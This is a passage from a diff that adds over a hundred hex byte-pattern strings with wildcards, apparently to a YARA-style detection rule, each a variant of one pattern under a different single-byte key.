+		$s007 = { 07 06 07 06 07 05 ?? ?? 07 05 07 06 07 05 ?? ?? 07 04 07 05 07 03 ?? ?? ?? ?? 07 03 07 05 07 03 ?? ?? ?? ?? 07 02 07 06 07 05 ?? ?? }
+		$s008 = { 08 09 08 09 08 0A ?? ?? 08 0A 08 09 08 0A ?? ?? 08 0B 08 0A 08 0C ?? ?? ?? ?? 08 0C 08 0A 08 0C ?? ?? ?? ?? 08 0D 08 09 08 0A ?? ?? }
+		$s009 = { 09 08 09 08 09 0B ?? ?? 09 0B 09 08 09 0B ?? ?? 09 0A 09 0B 09 0D ?? ?? ?? ?? 09 0D 09 0B 09 0D ?? ?? ?? ?? 09 0C 09 08 09 0B ?? ?? }
+		$s010 = { 0A 0B 0A 0B 0A 08 ?? ?? 0A 08 0A 0B 0A 08 ?? ?? 0A 09 0A 08 0A 0E ?? ?? ?? ?? 0A 0E 0A 08 0A 0E ?? ?? ?? ?? 0A 0F 0A 0B 0A 08 ?? ?? }
+		$s011 = { 0B 0A 0B 0A 0B 09 ?? ?? 0B 09 0B 0A 0B 09 ?? ?? 0B 08 0B 09 0B 0F ?? ?? ?? ?? 0B 0F 0B 09 0B 0F ?? ?? ?? ?? 0B 0E 0B 0A 0B 09 ?? ?? }
+		$s012 = { 0C 0D 0C 0D 0C 0E ?? ?? 0C 0E 0C 0D 0C 0E ?? ?? 0C 0F 0C 0E 0C 08 ?? ?? ?? ?? 0C 08 0C 0E 0C 08 ?? ?? ?? ?? 0C 09 0C 0D 0C 0E ?? ?? }
+		$s013 = { 0D 0C 0D 0C 0D 0F ?? ?? 0D 0F 0D 0C 0D 0F ?? ?? 0D 0E 0D 0F 0D 09 ?? ?? ?? ?? 0D 09 0D 0F 0D 09 ?? ?? ?? ?? 0D 08 0D 0C 0D 0F ?? ?? }
+		$s014 = { 0E 0F 0E 0F 0E 0C ?? ?? 0E 0C 0E 0F 0E 0C ?? ?? 0E 0D 0E 0C 0E 0A ?? ?? ?? ?? 0E 0A 0E 0C 0E 0A ?? ?? ?? ?? 0E 0B 0E 0F 0E 0C ?? ?? }
+		$s015 = { 0F 0E 0F 0E 0F 0D ?? ?? 0F 0D 0F 0E 0F 0D ?? ?? 0F 0C 0F 0D 0F 0B ?? ?? ?? ?? 0F 0B 0F 0D 0F 0B ?? ?? ?? ?? 0F 0A 0F 0E 0F 0D ?? ?? }
+		$s016 = { 10 11 10 11 10 12 ?? ?? 10 12 10 11 10 12 ?? ?? 10 13 10 12 10 14 ?? ?? ?? ?? 10 14 10 12 10 14 ?? ?? ?? ?? 10 15 10 11 10 12 ?? ?? }
+		$s017 = { 11 10 11 10 11 13 ?? ?? 11 13 11 10 11 13 ?? ?? 11 12 11 13 11 15 ?? ?? ?? ?? 11 15 11 13 11 15 ?? ?? ?? ?? 11 14 11 10 11 13 ?? ?? }
+		$s018 = { 12 13 12 13 12 10 ?? ?? 12 10 12 13 12 10 ?? ?? 12 11 12 10 12 16 ?? ?? ?? ?? 12 16 12 10 12 16 ?? ?? ?? ?? 12 17 12 13 12 10 ?? ?? }
+		$s019 = { 13 12 13 12 13 11 ?? ?? 13 11 13 12 13 11 ?? ?? 13 10 13 11 13 17 ?? ?? ?? ?? 13 17 13 11 13 17 ?? ?? ?? ?? 13 16 13 12 13 11 ?? ?? }
+		$s020 = { 14 15 14 15 14 16 ?? ?? 14 16 14 15 14 16 ?? ?? 14 17 14 16 14 10 ?? ?? ?? ?? 14 10 14 16 14 10 ?? ?? ?? ?? 14 11 14 15 14 16 ?? ?? }
+		$s021 = { 15 14 15 14 15 17 ?? ?? 15 17 15 14 15 17 ?? ?? 15 16 15 17 15 11 ?? ?? ?? ?? 15 11 15 17 15 11 ?? ?? ?? ?? 15 10 15 14 15 17 ?? ?? }
+		$s022 = { 16 17 16 17 16 14 ?? ?? 16 14 16 17 16 14 ?? ?? 16 15 16 14 16 12 ?? ?? ?? ?? 16 12 16 14 16 12 ?? ?? ?? ?? 16 13 16 17 16 14 ?? ?? }
+		$s023 = { 17 16 17 16 17 15 ?? ?? 17 15 17 16 17 15 ?? ?? 17 14 17 15 17 13 ?? ?? ?? ?? 17 13 17 15 17 13 ?? ?? ?? ?? 17 12 17 16 17 15 ?? ?? }
+		$s024 = { 18 19 18 19 18 1A ?? ?? 18 1A 18 19 18 1A ?? ?? 18 1B 18 1A 18 1C ?? ?? ?? ?? 18 1C 18 1A 18 1C ?? ?? ?? ?? 18 1D 18 19 18 1A ?? ?? }
+		$s025 = { 19 18 19 18 19 1B ?? ?? 19 1B 19 18 19 1B ?? ?? 19 1A 19 1B 19 1D ?? ?? ?? ?? 19 1D 19 1B 19 1D ?? ?? ?? ?? 19 1C 19 18 19 1B ?? ?? }
+		$s026 = { 1A 1B 1A 1B 1A 18 ?? ?? 1A 18 1A 1B 1A 18 ?? ?? 1A 19 1A 18 1A 1E ?? ?? ?? ?? 1A 1E 1A 18 1A 1E ?? ?? ?? ?? 1A 1F 1A 1B 1A 18 ?? ?? }
+		$s027 = { 1B 1A 1B 1A 1B 19 ?? ?? 1B 19 1B 1A 1B 19 ?? ?? 1B 18 1B 19 1B 1F ?? ?? ?? ?? 1B 1F 1B 19 1B 1F ?? ?? ?? ?? 1B 1E 1B 1A 1B 19 ?? ?? }
+		$s028 = { 1C 1D 1C 1D 1C 1E ?? ?? 1C 1E 1C 1D 1C 1E ?? ?? 1C 1F 1C 1E 1C 18 ?? ?? ?? ?? 1C 18 1C 1E 1C 18 ?? ?? ?? ?? 1C 19 1C 1D 1C 1E ?? ?? }
+		$s029 = { 1D 1C 1D 1C 1D 1F ?? ?? 1D 1F 1D 1C 1D 1F ?? ?? 1D 1E 1D 1F 1D 19 ?? ?? ?? ?? 1D 19 1D 1F 1D 19 ?? ?? ?? ?? 1D 18 1D 1C 1D 1F ?? ?? }
+		$s030 = { 1E 1F 1E 1F 1E 1C ?? ?? 1E 1C 1E 1F 1E 1C ?? ?? 1E 1D 1E 1C 1E 1A ?? ?? ?? ?? 1E 1A 1E 1C 1E 1A ?? ?? ?? ?? 1E 1B 1E 1F 1E 1C ?? ?? }
+		$s031 = { 1F 1E 1F 1E 1F 1D ?? ?? 1F 1D 1F 1E 1F 1D ?? ?? 1F 1C 1F 1D 1F 1B ?? ?? ?? ?? 1F 1B 1F 1D 1F 1B ?? ?? ?? ?? 1F 1A 1F 1E 1F 1D ?? ?? }
+		$s032 = { 20 21 20 21 20 22 ?? ?? 20 22 20 21 20 22 ?? ?? 20 23 20 22 20 24 ?? ?? ?? ?? 20 24 20 22 20 24 ?? ?? ?? ?? 20 25 20 21 20 22 ?? ?? }
+		$s033 = { 21 20 21 20 21 23 ?? ?? 21 23 21 20 21 23 ?? ?? 21 22 21 23 21 25 ?? ?? ?? ?? 21 25 21 23 21 25 ?? ?? ?? ?? 21 24 21 20 21 23 ?? ?? }
+		$s034 = { 22 23 22 23 22 20 ?? ?? 22 20 22 23 22 20 ?? ?? 22 21 22 20 22 26 ?? ?? ?? ?? 22 26 22 20 22 26 ?? ?? ?? ?? 22 27 22 23 22 20 ?? ?? }
+		$s035 = { 23 22 23 22 23 21 ?? ?? 23 21 23 22 23 21 ?? ?? 23 20 23 21 23 27 ?? ?? ?? ?? 23 27 23 21 23 27 ?? ?? ?? ?? 23 26 23 22 23 21 ?? ?? }
+		$s036 = { 24 25 24 25 24 26 ?? ?? 24 26 24 25 24 26 ?? ?? 24 27 24 26 24 20 ?? ?? ?? ?? 24 20 24 26 24 20 ?? ?? ?? ?? 24 21 24 25 24 26 ?? ?? }
+		$s037 = { 25 24 25 24 25 27 ?? ?? 25 27 25 24 25 27 ?? ?? 25 26 25 27 25 21 ?? ?? ?? ?? 25 21 25 27 25 21 ?? ?? ?? ?? 25 20 25 24 25 27 ?? ?? }
+		$s038 = { 26 27 26 27 26 24 ?? ?? 26 24 26 27 26 24 ?? ?? 26 25 26 24 26 22 ?? ?? ?? ?? 26 22 26 24 26 22 ?? ?? ?? ?? 26 23 26 27 26 24 ?? ?? }
+		$s039 = { 27 26 27 26 27 25 ?? ?? 27 25 27 26 27 25 ?? ?? 27 24 27 25 27 23 ?? ?? ?? ?? 27 23 27 25 27 23 ?? ?? ?? ?? 27 22 27 26 27 25 ?? ?? }
+		$s040 = { 28 29 28 29 28 2A ?? ?? 28 2A 28 29 28 2A ?? ?? 28 2B 28 2A 28 2C ?? ?? ?? ?? 28 2C 28 2A 28 2C ?? ?? ?? ?? 28 2D 28 29 28 2A ?? ?? }
+		$s041 = { 29 28 29 28 29 2B ?? ?? 29 2B 29 28 29 2B ?? ?? 29 2A 29 2B 29 2D ?? ?? ?? ?? 29 2D 29 2B 29 2D ?? ?? ?? ?? 29 2C 29 28 29 2B ?? ?? }
+		$s042 = { 2A 2B 2A 2B 2A 28 ?? ?? 2A 28 2A 2B 2A 28 ?? ?? 2A 29 2A 28 2A 2E ?? ?? ?? ?? 2A 2E 2A 28 2A 2E ?? ?? ?? ?? 2A 2F 2A 2B 2A 28 ?? ?? }
+		$s043 = { 2B 2A 2B 2A 2B 29 ?? ?? 2B 29 2B 2A 2B 29 ?? ?? 2B 28 2B 29 2B 2F ?? ?? ?? ?? 2B 2F 2B 29 2B 2F ?? ?? ?? ?? 2B 2E 2B 2A 2B 29 ?? ?? }
+		$s044 = { 2C 2D 2C 2D 2C 2E ?? ?? 2C 2E 2C 2D 2C 2E ?? ?? 2C 2F 2C 2E 2C 28 ?? ?? ?? ?? 2C 28 2C 2E 2C 28 ?? ?? ?? ?? 2C 29 2C 2D 2C 2E ?? ?? }
+		$s045 = { 2D 2C 2D 2C 2D 2F ?? ?? 2D 2F 2D 2C 2D 2F ?? ?? 2D 2E 2D 2F 2D 29 ?? ?? ?? ?? 2D 29 2D 2F 2D 29 ?? ?? ?? ?? 2D 28 2D 2C 2D 2F ?? ?? }
+		$s046 = { 2E 2F 2E 2F 2E 2C ?? ?? 2E 2C 2E 2F 2E 2C ?? ?? 2E 2D 2E 2C 2E 2A ?? ?? ?? ?? 2E 2A 2E 2C 2E 2A ?? ?? ?? ?? 2E 2B 2E 2F 2E 2C ?? ?? }
+		$s047 = { 2F 2E 2F 2E 2F 2D ?? ?? 2F 2D 2F 2E 2F 2D ?? ?? 2F 2C 2F 2D 2F 2B ?? ?? ?? ?? 2F 2B 2F 2D 2F 2B ?? ?? ?? ?? 2F 2A 2F 2E 2F 2D ?? ?? }
+		$s048 = { 30 31 30 31 30 32 ?? ?? 30 32 30 31 30 32 ?? ?? 30 33 30 32 30 34 ?? ?? ?? ?? 30 34 30 32 30 34 ?? ?? ?? ?? 30 35 30 31 30 32 ?? ?? }
+		$s049 = { 31 30 31 30 31 33 ?? ?? 31 33 31 30 31 33 ?? ?? 31 32 31 33 31 35 ?? ?? ?? ?? 31 35 31 33 31 35 ?? ?? ?? ?? 31 34 31 30 31 33 ?? ?? }
+		$s050 = { 32 33 32 33 32 30 ?? ?? 32 30 32 33 32 30 ?? ?? 32 31 32 30 32 36 ?? ?? ?? ?? 32 36 32 30 32 36 ?? ?? ?? ?? 32 37 32 33 32 30 ?? ?? }
+		$s051 = { 33 32 33 32 33 31 ?? ?? 33 31 33 32 33 31 ?? ?? 33 30 33 31 33 37 ?? ?? ?? ?? 33 37 33 31 33 37 ?? ?? ?? ?? 33 36 33 32 33 31 ?? ?? }
+		$s052 = { 34 35 34 35 34 36 ?? ?? 34 36 34 35 34 36 ?? ?? 34 37 34 36 34 30 ?? ?? ?? ?? 34 30 34 36 34 30 ?? ?? ?? ?? 34 31 34 35 34 36 ?? ?? }
+		$s053 = { 35 34 35 34 35 37 ?? ?? 35 37 35 34 35 37 ?? ?? 35 36 35 37 35 31 ?? ?? ?? ?? 35 31 35 37 35 31 ?? ?? ?? ?? 35 30 35 34 35 37 ?? ?? }
+		$s054 = { 36 37 36 37 36 34 ?? ?? 36 34 36 37 36 34 ?? ?? 36 35 36 34 36 32 ?? ?? ?? ?? 36 32 36 34 36 32 ?? ?? ?? ?? 36 33 36 37 36 34 ?? ?? }
+		$s055 = { 37 36 37 36 37 35 ?? ?? 37 35 37 36 37 35 ?? ?? 37 34 37 35 37 33 ?? ?? ?? ?? 37 33 37 35 37 33 ?? ?? ?? ?? 37 32 37 36 37 35 ?? ?? }
+		$s056 = { 38 39 38 39 38 3A ?? ?? 38 3A 38 39 38 3A ?? ?? 38 3B 38 3A 38 3C ?? ?? ?? ?? 38 3C 38 3A 38 3C ?? ?? ?? ?? 38 3D 38 39 38 3A ?? ?? }
+		$s057 = { 39 38 39 38 39 3B ?? ?? 39 3B 39 38 39 3B ?? ?? 39 3A 39 3B 39 3D ?? ?? ?? ?? 39 3D 39 3B 39 3D ?? ?? ?? ?? 39 3C 39 38 39 3B ?? ?? }
+		$s058 = { 3A 3B 3A 3B 3A 38 ?? ?? 3A 38 3A 3B 3A 38 ?? ?? 3A 39 3A 38 3A 3E ?? ?? ?? ?? 3A 3E 3A 38 3A 3E ?? ?? ?? ?? 3A 3F 3A 3B 3A 38 ?? ?? }
+		$s059 = { 3B 3A 3B 3A 3B 39 ?? ?? 3B 39 3B 3A 3B 39 ?? ?? 3B 38 3B 39 3B 3F ?? ?? ?? ?? 3B 3F 3B 39 3B 3F ?? ?? ?? ?? 3B 3E 3B 3A 3B 39 ?? ?? }
+		$s060 = { 3C 3D 3C 3D 3C 3E ?? ?? 3C 3E 3C 3D 3C 3E ?? ?? 3C 3F 3C 3E 3C 38 ?? ?? ?? ?? 3C 38 3C 3E 3C 38 ?? ?? ?? ?? 3C 39 3C 3D 3C 3E ?? ?? }
+		$s061 = { 3D 3C 3D 3C 3D 3F ?? ?? 3D 3F 3D 3C 3D 3F ?? ?? 3D 3E 3D 3F 3D 39 ?? ?? ?? ?? 3D 39 3D 3F 3D 39 ?? ?? ?? ?? 3D 38 3D 3C 3D 3F ?? ?? }
+		$s062 = { 3E 3F 3E 3F 3E 3C ?? ?? 3E 3C 3E 3F 3E 3C ?? ?? 3E 3D 3E 3C 3E 3A ?? ?? ?? ?? 3E 3A 3E 3C 3E 3A ?? ?? ?? ?? 3E 3B 3E 3F 3E 3C ?? ?? }
+		$s063 = { 3F 3E 3F 3E 3F 3D ?? ?? 3F 3D 3F 3E 3F 3D ?? ?? 3F 3C 3F 3D 3F 3B ?? ?? ?? ?? 3F 3B 3F 3D 3F 3B ?? ?? ?? ?? 3F 3A 3F 3E 3F 3D ?? ?? }
+		$s064 = { 40 41 40 41 40 42 ?? ?? 40 42 40 41 40 42 ?? ?? 40 43 40 42 40 44 ?? ?? ?? ?? 40 44 40 42 40 44 ?? ?? ?? ?? 40 45 40 41 40 42 ?? ?? }
+		$s065 = { 41 40 41 40 41 43 ?? ?? 41 43 41 40 41 43 ?? ?? 41 42 41 43 41 45 ?? ?? ?? ?? 41 45 41 43 41 45 ?? ?? ?? ?? 41 44 41 40 41 43 ?? ?? }
+		$s066 = { 42 43 42 43 42 40 ?? ?? 42 40 42 43 42 40 ?? ?? 42 41 42 40 42 46 ?? ?? ?? ?? 42 46 42 40 42 46 ?? ?? ?? ?? 42 47 42 43 42 40 ?? ?? }
+		$s067 = { 43 42 43 42 43 41 ?? ?? 43 41 43 42 43 41 ?? ?? 43 40 43 41 43 47 ?? ?? ?? ?? 43 47 43 41 43 47 ?? ?? ?? ?? 43 46 43 42 43 41 ?? ?? }
+		$s068 = { 44 45 44 45 44 46 ?? ?? 44 46 44 45 44 46 ?? ?? 44 47 44 46 44 40 ?? ?? ?? ?? 44 40 44 46 44 40 ?? ?? ?? ?? 44 41 44 45 44 46 ?? ?? }
+		$s069 = { 45 44 45 44 45 47 ?? ?? 45 47 45 44 45 47 ?? ?? 45 46 45 47 45 41 ?? ?? ?? ?? 45 41 45 47 45 41 ?? ?? ?? ?? 45 40 45 44 45 47 ?? ?? }
+		$s070 = { 46 47 46 47 46 44 ?? ?? 46 44 46 47 46 44 ?? ?? 46 45 46 44 46 42 ?? ?? ?? ?? 46 42 46 44 46 42 ?? ?? ?? ?? 46 43 46 47 46 44 ?? ?? }
+		$s071 = { 47 46 47 46 47 45 ?? ?? 47 45 47 46 47 45 ?? ?? 47 44 47 45 47 43 ?? ?? ?? ?? 47 43 47 45 47 43 ?? ?? ?? ?? 47 42 47 46 47 45 ?? ?? }
+		$s072 = { 48 49 48 49 48 4A ?? ?? 48 4A 48 49 48 4A ?? ?? 48 4B 48 4A 48 4C ?? ?? ?? ?? 48 4C 48 4A 48 4C ?? ?? ?? ?? 48 4D 48 49 48 4A ?? ?? }
+		$s073 = { 49 48 49 48 49 4B ?? ?? 49 4B 49 48 49 4B ?? ?? 49 4A 49 4B 49 4D ?? ?? ?? ?? 49 4D 49 4B 49 4D ?? ?? ?? ?? 49 4C 49 48 49 4B ?? ?? }
+		$s074 = { 4A 4B 4A 4B 4A 48 ?? ?? 4A 48 4A 4B 4A 48 ?? ?? 4A 49 4A 48 4A 4E ?? ?? ?? ?? 4A 4E 4A 48 4A 4E ?? ?? ?? ?? 4A 4F 4A 4B 4A 48 ?? ?? }
+		$s075 = { 4B 4A 4B 4A 4B 49 ?? ?? 4B 49 4B 4A 4B 49 ?? ?? 4B 48 4B 49 4B 4F ?? ?? ?? ?? 4B 4F 4B 49 4B 4F ?? ?? ?? ?? 4B 4E 4B 4A 4B 49 ?? ?? }
+		$s076 = { 4C 4D 4C 4D 4C 4E ?? ?? 4C 4E 4C 4D 4C 4E ?? ?? 4C 4F 4C 4E 4C 48 ?? ?? ?? ?? 4C 48 4C 4E 4C 48 ?? ?? ?? ?? 4C 49 4C 4D 4C 4E ?? ?? }
+		$s077 = { 4D 4C 4D 4C 4D 4F ?? ?? 4D 4F 4D 4C 4D 4F ?? ?? 4D 4E 4D 4F 4D 49 ?? ?? ?? ?? 4D 49 4D 4F 4D 49 ?? ?? ?? ?? 4D 48 4D 4C 4D 4F ?? ?? }
+		$s078 = { 4E 4F 4E 4F 4E 4C ?? ?? 4E 4C 4E 4F 4E 4C ?? ?? 4E 4D 4E 4C 4E 4A ?? ?? ?? ?? 4E 4A 4E 4C 4E 4A ?? ?? ?? ?? 4E 4B 4E 4F 4E 4C ?? ?? }
+		$s079 = { 4F 4E 4F 4E 4F 4D ?? ?? 4F 4D 4F 4E 4F 4D ?? ?? 4F 4C 4F 4D 4F 4B ?? ?? ?? ?? 4F 4B 4F 4D 4F 4B ?? ?? ?? ?? 4F 4A 4F 4E 4F 4D ?? ?? }
+		$s080 = { 50 51 50 51 50 52 ?? ?? 50 52 50 51 50 52 ?? ?? 50 53 50 52 50 54 ?? ?? ?? ?? 50 54 50 52 50 54 ?? ?? ?? ?? 50 55 50 51 50 52 ?? ?? }
+		$s081 = { 51 50 51 50 51 53 ?? ?? 51 53 51 50 51 53 ?? ?? 51 52 51 53 51 55 ?? ?? ?? ?? 51 55 51 53 51 55 ?? ?? ?? ?? 51 54 51 50 51 53 ?? ?? }
+		$s082 = { 52 53 52 53 52 50 ?? ?? 52 50 52 53 52 50 ?? ?? 52 51 52 50 52 56 ?? ?? ?? ?? 52 56 52 50 52 56 ?? ?? ?? ?? 52 57 52 53 52 50 ?? ?? }
+		$s083 = { 53 52 53 52 53 51 ?? ?? 53 51 53 52 53 51 ?? ?? 53 50 53 51 53 57 ?? ?? ?? ?? 53 57 53 51 53 57 ?? ?? ?? ?? 53 56 53 52 53 51 ?? ?? }
+		$s084 = { 54 55 54 55 54 56 ?? ?? 54 56 54 55 54 56 ?? ?? 54 57 54 56 54 50 ?? ?? ?? ?? 54 50 54 56 54 50 ?? ?? ?? ?? 54 51 54 55 54 56 ?? ?? }
+		$s085 = { 55 54 55 54 55 57 ?? ?? 55 57 55 54 55 57 ?? ?? 55 56 55 57 55 51 ?? ?? ?? ?? 55 51 55 57 55 51 ?? ?? ?? ?? 55 50 55 54 55 57 ?? ?? }
+		$s086 = { 56 57 56 57 56 54 ?? ?? 56 54 56 57 56 54 ?? ?? 56 55 56 54 56 52 ?? ?? ?? ?? 56 52 56 54 56 52 ?? ?? ?? ?? 56 53 56 57 56 54 ?? ?? }
+		$s087 = { 57 56 57 56 57 55 ?? ?? 57 55 57 56 57 55 ?? ?? 57 54 57 55 57 53 ?? ?? ?? ?? 57 53 57 55 57 53 ?? ?? ?? ?? 57 52 57 56 57 55 ?? ?? }
+		$s088 = { 58 59 58 59 58 5A ?? ?? 58 5A 58 59 58 5A ?? ?? 58 5B 58 5A 58 5C ?? ?? ?? ?? 58 5C 58 5A 58 5C ?? ?? ?? ?? 58 5D 58 59 58 5A ?? ?? }
+		$s089 = { 59 58 59 58 59 5B ?? ?? 59 5B 59 58 59 5B ?? ?? 59 5A 59 5B 59 5D ?? ?? ?? ?? 59 5D 59 5B 59 5D ?? ?? ?? ?? 59 5C 59 58 59 5B ?? ?? }
+		$s090 = { 5A 5B 5A 5B 5A 58 ?? ?? 5A 58 5A 5B 5A 58 ?? ?? 5A 59 5A 58 5A 5E ?? ?? ?? ?? 5A 5E 5A 58 5A 5E ?? ?? ?? ?? 5A 5F 5A 5B 5A 58 ?? ?? }
+		$s091 = { 5B 5A 5B 5A 5B 59 ?? ?? 5B 59 5B 5A 5B 59 ?? ?? 5B 58 5B 59 5B 5F ?? ?? ?? ?? 5B 5F 5B 59 5B 5F ?? ?? ?? ?? 5B 5E 5B 5A 5B 59 ?? ?? }
+		$s092 = { 5C 5D 5C 5D 5C 5E ?? ?? 5C 5E 5C 5D 5C 5E ?? ?? 5C 5F 5C 5E 5C 58 ?? ?? ?? ?? 5C 58 5C 5E 5C 58 ?? ?? ?? ?? 5C 59 5C 5D 5C 5E ?? ?? }
+		$s093 = { 5D 5C 5D 5C 5D 5F ?? ?? 5D 5F 5D 5C 5D 5F ?? ?? 5D 5E 5D 5F 5D 59 ?? ?? ?? ?? 5D 59 5D 5F 5D 59 ?? ?? ?? ?? 5D 58 5D 5C 5D 5F ?? ?? }
+		$s094 = { 5E 5F 5E 5F 5E 5C ?? ?? 5E 5C 5E 5F 5E 5C ?? ?? 5E 5D 5E 5C 5E 5A ?? ?? ?? ?? 5E 5A 5E 5C 5E 5A ?? ?? ?? ?? 5E 5B 5E 5F 5E 5C ?? ?? }
+		$s095 = { 5F 5E 5F 5E 5F 5D ?? ?? 5F 5D 5F 5E 5F 5D ?? ?? 5F 5C 5F 5D 5F 5B ?? ?? ?? ?? 5F 5B 5F 5D 5F 5B ?? ?? ?? ?? 5F 5A 5F 5E 5F 5D ?? ?? }
+		$s096 = { 60 61 60 61 60 62 ?? ?? 60 62 60 61 60 62 ?? ?? 60 63 60 62 60 64 ?? ?? ?? ?? 60 64 60 62 60 64 ?? ?? ?? ?? 60 65 60 61 60 62 ?? ?? }
+		$s097 = { 61 60 61 60 61 63 ?? ?? 61 63 61 60 61 63 ?? ?? 61 62 61 63 61 65 ?? ?? ?? ?? 61 65 61 63 61 65 ?? ?? ?? ?? 61 64 61 60 61 63 ?? ?? }
+		$s098 = { 62 63 62 63 62 60 ?? ?? 62 60 62 63 62 60 ?? ?? 62 61 62 60 62 66 ?? ?? ?? ?? 62 66 62 60 62 66 ?? ?? ?? ?? 62 67 62 63 62 60 ?? ?? }
+		$s099 = { 63 62 63 62 63 61 ?? ?? 63 61 63 62 63 61 ?? ?? 63 60 63 61 63 67 ?? ?? ?? ?? 63 67 63 61 63 67 ?? ?? ?? ?? 63 66 63 62 63 61 ?? ?? }
+		$s100 = { 64 65 64 65 64 66 ?? ?? 64 66 64 65 64 66 ?? ?? 64 67 64 66 64 60 ?? ?? ?? ?? 64 60 64 66 64 60 ?? ?? ?? ?? 64 61 64 65 64 66 ?? ?? }
+		$s101 = { 65 64 65 64 65 67 ?? ?? 65 67 65 64 65 67 ?? ?? 65 66 65 67 65 61 ?? ?? ?? ?? 65 61 65 67 65 61 ?? ?? ?? ?? 65 60 65 64 65 67 ?? ?? }
+		$s102 = { 66 67 66 67 66 64 ?? ?? 66 64 66 67 66 64 ?? ?? 66 65 66 64 66 62 ?? ?? ?? ?? 66 62 66 64 66 62 ?? ?? ?? ?? 66 63 66 67 66 64 ?? ?? }
+		$s103 = { 67 66 67 66 67 65 ?? ?? 67 65 67 66 67 65 ?? ?? 67 64 67 65 67 63 ?? ?? ?? ?? 67 63 67 65 67 63 ?? ?? ?? ?? 67 62 67 66 67 65 ?? ?? }
+		$s104 = { 68 69 68 69 68 6A ?? ?? 68 6A 68 69 68 6A ?? ?? 68 6B 68 6A 68 6C ?? ?? ?? ?? 68 6C 68 6A 68 6C ?? ?? ?? ?? 68 6D 68 69 68 6A ?? ?? }
+		$s105 = { 69 68 69 68 69 6B ?? ?? 69 6B 69 68 69 6B ?? ?? 69 6A 69 6B 69 6D ?? ?? ?? ?? 69 6D 69 6B 69 6D ?? ?? ?? ?? 69 6C 69 68 69 6B ?? ?? }
+		$s106 = { 6A 6B 6A 6B 6A 68 ?? ?? 6A 68 6A 6B 6A 68 ?? ?? 6A 69 6A 68 6A 6E ?? ?? ?? ?? 6A 6E 6A 68 6A 6E ?? ?? ?? ?? 6A 6F 6A 6B 6A 68 ?? ?? }
+		$s107 = { 6B 6A 6B 6A 6B 69 ?? ?? 6B 69 6B 6A 6B 69 ?? ?? 6B 68 6B 69 6B 6F ?? ?? ?? ?? 6B 6F 6B 69 6B 6F ?? ?? ?? ?? 6B 6E 6B 6A 6B 69 ?? ?? }
+		$s108 = { 6C 6D 6C 6D 6C 6E ?? ?? 6C 6E 6C 6D 6C 6E ?? ?? 6C 6F 6C 6E 6C 68 ?? ?? ?? ?? 6C 68 6C 6E 6C 68 ?? ?? ?? ?? 6C 69 6C 6D 6C 6E ?? ?? }
+		$s109 = { 6D 6C 6D 6C 6D 6F ?? ?? 6D 6F 6D 6C 6D 6F ?? ?? 6D 6E 6D 6F 6D 69 ?? ?? ?? ?? 6D 69 6D 6F 6D 69 ?? ?? ?? ?? 6D 68 6D 6C 6D 6F ?? ?? }
+		$s110 = { 6E 6F 6E 6F 6E 6C ?? ?? 6E 6C 6E 6F 6E 6C ?? ?? 6E 6D 6E 6C 6E 6A ?? ?? ?? ?? 6E 6A 6E 6C 6E 6A ?? ?? ?? ?? 6E 6B 6E 6F 6E 6C ?? ?? }
+		$s111 = { 6F 6E 6F 6E 6F 6D ?? ?? 6F 6D 6F 6E 6F 6D ?? ?? 6F 6C 6F 6D 6F 6B ?? ?? ?? ?? 6F 6B 6F 6D 6F 6B ?? ?? ?? ?? 6F 6A 6F 6E 6F 6D ?? ?? }
+		$s112 = { 70 71 70 71 70 72 ?? ?? 70 72 70 71 70 72 ?? ?? 70 73 70 72 70 74 ?? ?? ?? ?? 70 74 70 72 70 74 ?? ?? ?? ?? 70 75 70 71 70 72 ?? ?? }
+		$s113 = { 71 70 71 70 71 73 ?? ?? 71 73 71 70 71 73 ?? ?? 71 72 71 73 71 75 ?? ?? ?? ?? 71 75 71 73 71 75 ?? ?? ?? ?? 71 74 71 70 71 73 ?? ?? }
+		$s114 = { 72 73 72 73 72 70 ?? ?? 72 70 72 73 72 70 ?? ?? 72 71 72 70 72 76 ?? ?? ?? ?? 72 76 72 70 72 76 ?? ?? ?? ?? 72 77 72 73 72 70 ?? ?? }
+		$s115 = { 73 72 73 72 73 71 ?? ?? 73 71 73 72 73 71 ?? ?? 73 70 73 71 73 77 ?? ?? ?? ?? 73 77 73 71 73 77 ?? ?? ?? ?? 73 76 73 72 73 71 ?? ?? }
+		$s116 = { 74 75 74 75 74 76 ?? ?? 74 76 74 75 74 76 ?? ?? 74 77 74 76 74 70 ?? ?? ?? ?? 74 70 74 76 74 70 ?? ?? ?? ?? 74 71 74 75 74 76 ?? ?? }
+		$s117 = { 75 74 75 74 75 77 ?? ?? 75 77 75 74 75 77 ?? ?? 75 76 75 77 75 71 ?? ?? ?? ?? 75 71 75 77 75 71 ?? ?? ?? ?? 75 70 75 74 75 77 ?? ?? }
+		$s118 = { 76 77 76 77 76 74 ?? ?? 76 74 76 77 76 74 ?? ?? 76 75 76 74 76 72 ?? ?? ?? ?? 76 72 76 74 76 72 ?? ?? ?? ?? 76 73 76 77 76 74 ?? ?? }
+		$s119 = { 77 76 77 76 77 75 ?? ?? 77 75 77 76 77 75 ?? ?? 77 74 77 75 77 73 ?? ?? ?? ?? 77 73 77 75 77 73 ?? ?? ?? ?? 77 72 77 76 77 75 ?? ?? }
+		$s120 = { 78 79 78 79 78 7A ?? ?? 78 7A 78 79 78 7A ?? ?? 78 7B 78 7A 78 7C ?? ?? ?? ?? 78 7C 78 7A 78 7C ?? ?? ?? ?? 78 7D 78 79 78 7A ?? ?? }
+		$s121 = { 79 78 79 78 79 7B ?? ?? 79 7B 79 78 79 7B ?? ?? 79 7A 79 7B 79 7D ?? ?? ?? ?? 79 7D 79 7B 79 7D ?? ?? ?? ?? 79 7C 79 78 79 7B ?? ?? }
+		$s122 = { 7A 7B 7A 7B 7A 78 ?? ?? 7A 78 7A 7B 7A 78 ?? ?? 7A 79 7A 78 7A 7E ?? ?? ?? ?? 7A 7E 7A 78 7A 7E ?? ?? ?? ?? 7A 7F 7A 7B 7A 78 ?? ?? }
+		$s123 = { 7B 7A 7B 7A 7B 79 ?? ?? 7B 79 7B 7A 7B 79 ?? ?? 7B 78 7B 79 7B 7F ?? ?? ?? ?? 7B 7F 7B 79 7B 7F ?? ?? ?? ?? 7B 7E 7B 7A 7B 79 ?? ?? }
+		$s124 = { 7C 7D 7C 7D 7C 7E ?? ?? 7C 7E 7C 7D 7C 7E ?? ?? 7C 7F 7C 7E 7C 78 ?? ?? ?? ?? 7C 78 7C 7E 7C 78 ?? ?? ?? ?? 7C 79 7C 7D 7C 7E ?? ?? }
